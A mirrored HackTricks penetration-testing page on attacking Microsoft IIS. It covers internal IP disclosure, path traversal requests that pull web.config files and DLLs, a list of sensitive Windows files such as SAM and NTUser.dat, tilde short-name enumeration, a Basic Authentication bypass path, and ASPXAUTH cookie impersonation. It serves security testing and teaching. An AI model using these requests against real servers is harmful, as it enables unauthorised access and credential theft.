mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-01 15:58:49 +00:00
371 lines
17 KiB
Markdown
371 lines
17 KiB
Markdown
# IIS - Internet Information Services
|
||
|
||
Test executable file extensions:
|
||
|
||
* asp
|
||
* aspx
|
||
* config
|
||
* php
|
||
|
||
## Internal IP Address disclosure
|
||
|
||
On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address:
|
||
|
||
```
|
||
nc -v domain.com 80
|
||
openssl s_client -connect domain.com:443
|
||
```
|
||
|
||
Response disclosing the internal IP:
|
||
|
||
```
|
||
GET / HTTP/1.0
|
||
|
||
HTTP/1.1 302 Moved Temporarily
|
||
Cache-Control: no-cache
|
||
Pragma: no-cache
|
||
Location: https://192.168.5.237/owa/
|
||
Server: Microsoft-IIS/10.0
|
||
X-FEServer: NHEXCHANGE2016
|
||
```
|
||
|
||
## Execute .config files
|
||
|
||
You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: [Download example here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
|
||
|
||
More information and techniques to exploit this vulnerability [here](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
|
||
|
||
## IIS Discovery Bruteforce
|
||
|
||
Download the list that I have created:
|
||
|
||
{% file src="../../.gitbook/assets/iisfinal.txt" %}
|
||
|
||
It was created merging the contents of the following lists:
|
||
|
||
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\
|
||
[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\
|
||
[https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt](https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt)\
|
||
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt)\
|
||
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
|
||
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
|
||
|
||
Use it without adding any extension, the files that need it have it already.
|
||
|
||
## Path Traversal
|
||
|
||
### Leaking source code
|
||
|
||
{% hint style="info" %}
|
||
As summary, there are several web.config files inside the folders of the application with references to "**assemblyIdentity**" files and "**namespaces**". With this information it's possible to know **where are executables located** and download them.\
|
||
From the **downloaded Dlls** it's also possible to find **new namespaces** where you should try to access and get the web.config file in order to find new namespaces and assemblyIdentity.\
|
||
Also, the files **connectionstrings.config** and **global.asax** may contain interesting information.\
|
||
Reference: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
|
||
{% endhint %}
|
||
|
||
As any .Net application, MVC applications have a **web.config** file, where "**assemblyIdentity**" XML tags identifies every binary file the application uses.
|
||
|
||
```markup
|
||
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
|
||
Host: example-mvc-application.minded
|
||
[...]
|
||
|
||
HTTP/1.1 200 OK
|
||
[...]
|
||
<?xml version="1.0" encoding="utf-8"?>
|
||
<configuration>
|
||
<configSections>
|
||
<section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral" requirePermission="false" />
|
||
</configSections>
|
||
<appSettings>
|
||
<add key="webpages:Version" value="3.0.0.0" />
|
||
<add key="webpages:Enabled" value="false" />
|
||
<add key="ClientValidationEnabled" value="true" />
|
||
<add key="UnobtrusiveJavaScriptEnabled" value="true" />
|
||
</appSettings>
|
||
<system.web>
|
||
<authentication mode="None" />
|
||
<compilation debug="true" targetFramework="4.6.1" />
|
||
<httpRuntime targetFramework="4.6.1" />
|
||
</system.web>
|
||
<system.webServer>
|
||
<modules>
|
||
<remove name="FormsAuthentication" />
|
||
</modules>
|
||
</system.webServer>
|
||
<runtime>
|
||
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
|
||
<dependentAssembly>
|
||
<assemblyIdentity name="Microsoft.Owin.Security" />
|
||
<bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
|
||
</dependentAssembly>
|
||
<dependentAssembly>
|
||
<assemblyIdentity name="Microsoft.Owin.Security.OAuth" />
|
||
<bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
|
||
</dependentAssembly>
|
||
<dependentAssembly>
|
||
<assemblyIdentity name="Microsoft.Owin.Security.Cookies" />
|
||
<bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
|
||
</dependentAssembly>
|
||
<dependentAssembly>
|
||
<assemblyIdentity name="Microsoft.Owin" />
|
||
<bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
|
||
</dependentAssembly>
|
||
<dependentAssembly>
|
||
<assemblyIdentity name="Newtonsoft.Json" culture="neutral" />
|
||
<bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
|
||
</dependentAssembly>
|
||
<dependentAssembly>
|
||
<assemblyIdentity name="System.Web.Optimization" />
|
||
<bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="1.1.0.0" />
|
||
</dependentAssembly>
|
||
<dependentAssembly>
|
||
<assemblyIdentity name="WebGrease" />
|
||
<bindingRedirect oldVersion="0.0.0.0-1.5.2.14234" newVersion="1.5.2.14234" />
|
||
</dependentAssembly>
|
||
<dependentAssembly>
|
||
<assemblyIdentity name="System.Web.Helpers" />
|
||
<bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
|
||
</dependentAssembly>
|
||
<dependentAssembly>
|
||
<assemblyIdentity name="System.Web.Mvc" />
|
||
<bindingRedirect oldVersion="1.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
|
||
</dependentAssembly>
|
||
<dependentAssembly>
|
||
<assemblyIdentity name="System.Web.WebPages" />
|
||
<bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
|
||
</dependentAssembly>
|
||
</assemblyBinding>
|
||
```
|
||
|
||
In the previous output you can references to several "**assemblyIdentity**". These are files that may be located inside the /bin folder. For example: **/bin/WebGrease.dll.**
|
||
|
||
Other files that could be found in the root directory of a .Net application are **/global.asax**
|
||
|
||
```markup
|
||
<%@ Application Codebehind="Global.asax.cs" Inherits="WebApplication1.MvcApplication" Language="C#" %>
|
||
```
|
||
|
||
And **/connectionstrings.config**
|
||
|
||
**Note: this file contains passwords!**
|
||
|
||
```markup
|
||
<connectionStrings>
|
||
<add name="DefaultConnection" connectionString="Data Source=(LocalDb)\MSSQLLocalDB;AttachDbFilename [...]" providerName="System.Data.SqlClient" />
|
||
</connectionStrings>
|
||
```
|
||
|
||
#### Namespaces
|
||
|
||
In addition, .Net MVC applications are structured to define **other web.config files**, having the aim to include any declaration for specific namespaces for each set of viewpages, relieving developers to declare “@using” namespaces in every file.
|
||
|
||
```markup
|
||
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
|
||
Host: example-mvc-application.minded
|
||
[...]
|
||
|
||
HTTP/1.1 200 OK
|
||
[...]
|
||
<?xml version="1.0"?>
|
||
<configuration>
|
||
<configSections>
|
||
<sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral">
|
||
<section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
|
||
<section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
|
||
</sectionGroup>
|
||
</configSections>
|
||
<system.web.webPages.razor><host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" /><pages pageBaseType="System.Web.Mvc.WebViewPage">
|
||
<namespaces>
|
||
<add namespace="System.Web.Mvc" />
|
||
<add namespace="System.Web.Mvc.Ajax" />
|
||
<add namespace="System.Web.Mvc.Html" />
|
||
<add namespace="System.Web.Optimization"/>
|
||
<add namespace="System.Web.Routing" />
|
||
<add namespace="WebApplication1" />
|
||
```
|
||
|
||
#### Downloading DLLs
|
||
|
||
From a very previous response, the declaration of a **custom namespace** (since other namespaces are defaults) suggests that a DLL called "**WebApplication1**" is present in the /bin directory.
|
||
|
||
```
|
||
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
|
||
Host: example-mvc-application.minded
|
||
[...]
|
||
```
|
||
|
||
From the previous output, inside the /bin directory you will also be able to find the Dlls
|
||
|
||
* System.Web.Mvc.dll
|
||
* System.Web.Mvc.Ajax.dll
|
||
* System.Web.Mvc.Html.dll
|
||
* System.Web.Optimization.dll
|
||
* System.Web.Routing.dll
|
||
|
||
Let's suppose that the previous DLL is importing a namespace called **WebApplication1.Areas.Minded.** an attacker can infer that other web.config files are present in the application, in guessable/default paths as **/area-name/Views/**, containing specific configurations that may refer to other DLL files present in the /bin folder.
|
||
|
||
```markup
|
||
GET /download_page?id=..%2f..%2fMinded/Views/web.config HTTP/1.1
|
||
Host: example-mvc-application.minded
|
||
[...]
|
||
|
||
HTTP/1.1 200 OK
|
||
[...]
|
||
<?xml version="1.0"?>
|
||
<configuration>
|
||
<configSections>
|
||
<sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral">
|
||
<section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
|
||
<section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral” requirePermission="false" />
|
||
</sectionGroup>
|
||
</configSections>
|
||
<system.web.webPages.razor><host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" />
|
||
<pages pageBaseType="System.Web.Mvc.WebViewPage">
|
||
<namespaces>
|
||
<add namespace="System.Web.Mvc" />
|
||
<add namespace="System.Web.Mvc.Ajax" />
|
||
<add namespace="System.Web.Mvc.Html" />
|
||
<add namespace="System.Web.Routing" />
|
||
<add namespace="System.Web.Optimization" />
|
||
<add namespace="WebApplication1" />
|
||
<add namespace="WebApplication1.AdditionalFeatures" />
|
||
</namespaces>
|
||
```
|
||
|
||
Note how in the previous output you can see a new namespace called: **WebApplication1.AdditionalFeatures** which indicates that there is another Dll in the /bin folder called **WebApplication1.AdditionalFeatures.dll**
|
||
|
||
### Common files
|
||
|
||
From [here](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
|
||
|
||
```
|
||
C:\Apache\conf\httpd.conf
|
||
C:\Apache\logs\access.log
|
||
C:\Apache\logs\error.log
|
||
C:\Apache2\conf\httpd.conf
|
||
C:\Apache2\logs\access.log
|
||
C:\Apache2\logs\error.log
|
||
C:\Apache22\conf\httpd.conf
|
||
C:\Apache22\logs\access.log
|
||
C:\Apache22\logs\error.log
|
||
C:\Apache24\conf\httpd.conf
|
||
C:\Apache24\logs\access.log
|
||
C:\Apache24\logs\error.log
|
||
C:\Documents and Settings\Administrator\NTUser.dat
|
||
C:\php\php.ini
|
||
C:\php4\php.ini
|
||
C:\php5\php.ini
|
||
C:\php7\php.ini
|
||
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
|
||
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
|
||
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
|
||
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
|
||
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
|
||
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
|
||
c:\Program Files (x86)\php\php.ini"
|
||
C:\Program Files\Apache Group\Apache\conf\httpd.conf
|
||
C:\Program Files\Apache Group\Apache\conf\logs\access.log
|
||
C:\Program Files\Apache Group\Apache\conf\logs\error.log
|
||
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
|
||
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
|
||
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
|
||
C:\Program Files\FileZilla Server\FileZilla Server.xml
|
||
C:\Program Files\MySQL\my.cnf
|
||
C:\Program Files\MySQL\my.ini
|
||
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
|
||
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
|
||
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
|
||
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
|
||
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
|
||
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
|
||
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
|
||
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
|
||
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
|
||
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
|
||
C:\Program Files\php\php.ini
|
||
C:\Users\Administrator\NTUser.dat
|
||
C:\Windows\debug\NetSetup.LOG
|
||
C:\Windows\Panther\Unattend\Unattended.xml
|
||
C:\Windows\Panther\Unattended.xml
|
||
C:\Windows\php.ini
|
||
C:\Windows\repair\SAM
|
||
C:\Windows\repair\system
|
||
C:\Windows\System32\config\AppEvent.evt
|
||
C:\Windows\System32\config\RegBack\SAM
|
||
C:\Windows\System32\config\RegBack\system
|
||
C:\Windows\System32\config\SAM
|
||
C:\Windows\System32\config\SecEvent.evt
|
||
C:\Windows\System32\config\SysEvent.evt
|
||
C:\Windows\System32\config\SYSTEM
|
||
C:\Windows\System32\drivers\etc\hosts
|
||
C:\Windows\System32\winevt\Logs\Application.evtx
|
||
C:\Windows\System32\winevt\Logs\Security.evtx
|
||
C:\Windows\System32\winevt\Logs\System.evtx
|
||
C:\Windows\win.ini
|
||
C:\xampp\apache\conf\extra\httpd-xampp.conf
|
||
C:\xampp\apache\conf\httpd.conf
|
||
C:\xampp\apache\logs\access.log
|
||
C:\xampp\apache\logs\error.log
|
||
C:\xampp\FileZillaFTP\FileZilla Server.xml
|
||
C:\xampp\MercuryMail\MERCURY.INI
|
||
C:\xampp\mysql\bin\my.ini
|
||
C:\xampp\php\php.ini
|
||
C:\xampp\security\webdav.htpasswd
|
||
C:\xampp\sendmail\sendmail.ini
|
||
C:\xampp\tomcat\conf\server.xml
|
||
```
|
||
|
||
## HTTPAPI 2.0 404 Error
|
||
|
||
If you see an error like the following one:
|
||
|
||
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2).png>)
|
||
|
||
It means that the server **didn't receive the correct domain name** inside the Host header.\
|
||
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
|
||
|
||
## Old IIS vulnerabilities worth looking for
|
||
|
||
### Microsoft IIS tilde character “\~” Vulnerability/Feature – Short File/Folder Name Disclosure
|
||
|
||
You can try to **enumerate folders and files** inside every discovered folder (even if it's requiring Basic Authentication) using this **technique**.\
|
||
The main limitation of this technique if the server is vulnerable is that **it can only find up to the first 6 letters of the name of each file/folder and the first 3 letters of the extension** of the files.
|
||
|
||
You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) to test for this vulnerability:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
|
||
|
||
![](<../../.gitbook/assets/image (183).png>)
|
||
|
||
Original research: [https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf)
|
||
|
||
You can also use **metasploit**: `use scanner/http/iis_shortname_scanner`
|
||
|
||
### Basic Authentication bypass
|
||
|
||
**Bypass** a Baisc authentication (**IIS 7.5**) trying to access: `/admin:$i30:$INDEX_ALLOCATION/admin.php` or `/admin::$INDEX_ALLOCATION/admin.php`
|
||
|
||
You can try to **mix** this **vulnerability** and the last one to find new **folders** and **bypass** the authentication.
|
||
|
||
## ASP.NET Trace.AXD enabled debugging
|
||
|
||
ASP.NET include a debugging mode and its file is called `trace.axd`.
|
||
|
||
It keeps a very detailed log of all requests made to an application over a period of time.
|
||
|
||
This information includes remote client IP's, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords.
|
||
|
||
[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
|
||
|
||
![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png)
|
||
|
||
## ASPXAUTH Cookie
|
||
|
||
ASPXAUTH uses the following info:
|
||
|
||
* **`validationKey`** (string): hex-encoded key to use for signature validation.
|
||
* **`decryptionMethod`** (string): (default “AES”).
|
||
* **`decryptionIV`** (string): hex-encoded initialization vector (defaults to a vector of zeros).
|
||
* **`decryptionKey`** (string): hex-encoded key to use for decryption.
|
||
|
||
However, some people will use the **default values** of these parameters and will use as **cookie the email of the user**. Therefore, if you can find a web using the **same platform** that is using the ASPXAUTH cookie and you **create a user with the email of the user you want to impersonate** on the server under attack, you may be able to us**e the cookie from the second server in the first one** and impersonate the user.\
|
||
This attacked worked in this [**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
|